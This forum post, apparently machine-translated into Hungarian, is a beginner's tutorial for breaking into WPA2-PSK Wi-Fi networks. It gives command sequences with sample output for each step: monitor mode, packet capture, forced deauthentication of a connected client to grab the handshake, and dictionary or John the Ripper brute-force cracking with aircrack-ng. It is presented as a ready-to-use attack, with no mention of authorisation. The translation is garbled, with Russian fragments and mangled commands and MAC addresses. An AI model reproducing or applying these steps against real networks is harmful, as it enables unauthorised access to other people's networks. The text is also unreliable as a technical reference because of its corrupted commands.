Hacking wi-fi kezdőknek

Hacking wi-fi kezdőknek.

Hacking wi-fi kezdőknek.

hogyan kell megkerülni a védelmet pontok és hogyan kell generálni hash repedések WPA keresztül airolib-ng

Re: Breaking wi-fi kezdőknek.







Hozzáadott után 23 óra 41 perc
WPA hack.


Fogom használni Dlink DWL-G122 (USB), vezeték nélküli hálózati csatoló ezt az eljárást. A backtrack4, felismerte az eszközt wlan0.

Először is, tedd be a kártyát monitor mód:

Interface Chipset illesztőprogram

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (szülő: wifi0)
ATH1 Atheros madwifi-ng VAP (szülő: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]

# Airmon-ng indul wlan0

Interface Chipset illesztőprogram

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (szülő: wifi0)
ATH1 Atheros madwifi-ng VAP (szülő: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(Monitor üzemmód engedélyezve mon0)
.

Nos, most már tudjuk használni a felületet mon0

Keressünk egy vezeték nélküli hálózat, amely WPA2 / PSK

BSSID PWR Beacons #data, # / s CH MB ENC CIPHER AUTH ESSID

00: 19: 5B: 52: AD: F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Rate elveszett csomagok Probe

00: 19: 5B: 52: AD: F7 00: 1C: BF: 90: 5B: A3 -29 0- 12 január 4 TestNet

Megáll airodump-ng (ctrl + c), majd futtassa újra, valami, hogy írják le az összes csomagot a lemezen

airodump-ng mon0 --channel --bssid 10 00: 19: 5B: 52: AD: F7 -w / tmp / WPA2








Ezen a ponton, akkor két lehetőség van: vagy várjon, amíg a kliens csatlakozni, és 4-kézfogás nem fejeződik, vagy deauthenticate meglévő ügyfelek, és így AP újratársításához. Az idő pénz, úgyhogy győződjön erő deauthenticate. Meg kell kezdeni beírásával aireplay-ng BSSID AP (ek) és a MAC a csatlakoztatott kliens (c)

# Aireplay-ng -0 -a 1 00: 19: 5B: 52: AD: F7 -c 00: 1C: BF: 90: 5B: A3 mon0

13:04:19 Várakozás beacon keret (BSSID: 00: 19: 5B: 52: AD: F7) csatornán 10

13:04:20 küldése 64 irányított DeAuth. STMAC: [00: 1C: BF: 90: 5B: A3] [67 | 66 ACK]

Ennek eredményeként airodump-ng ukazhet „WPA kézfogás:” a jobb felső sarokban

BSSID PWR RXQ lámpákhoz #data, # / s CH MB ENC CIPHER AUTH ESSID

00: 19: 5B: 52: AD: F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Rate elveszett csomagok Probe

00: 19: 5B: 52: AD: F7 00: 1C: BF: 90: 5B: A3 -27 54-54 0230


Ostanovite airodump-ng és biztosítja, hogy a fájl jön létre megfelelően

root @ bt: / # ls / tmp / WPA2 * -al

2 módja van bruteforcing: az egyik, hogy viszonylag gyorsan, de nem garantálja a sikert, és az egyik, hogy nagyon lassú, de ez biztosítja, hogy megtalálja a kulcsot egy bizonyos idő után.

Az első lehetőség a használata a munkalistában / szótár fájlt. Sok ilyen fájlokat, megtalálható az interneten, vagy előállíthatók olyan eszközök segítségével, mint például John the Ripper. Ha ezt a szót lista létrehozása, mindössze annyit kell tennie, hogy fut aircrack-ng helyett fájlt kézfogás és szókincs word.txt

aircrack-ng -w /tmp/wordlists/word.lst -B 00: 19: 5B: 52: AD: F7 /tmp/wpa2*.cap

A második módszer (bruteforcing) sikeres lesz, az biztos, de lehet, hogy hosszú időt vesz igénybe. befejezéséhez. Tartsuk szem előtt, WPA2 kulcs lehet maximum 64 karakter, így elméletileg az, hogy létrejöjjön valamennyi kombinációját jelszavakat minden karakterkészlet és etetni őket aircrack sokáig. Ha a használni kívánt John The Ripper, hogy hozzon létre az összes lehetséges jelszó kombinációt, és etetni őket aircrack-NG, az a parancs használata:

# / Pentest / jelszó / JTR / John --stdout --incremental: minden | aircrack-ng -b 00: 19: 5B: 52: AD: F7 -w - /tmp/wpa2*.cap




Kapcsolódó cikkek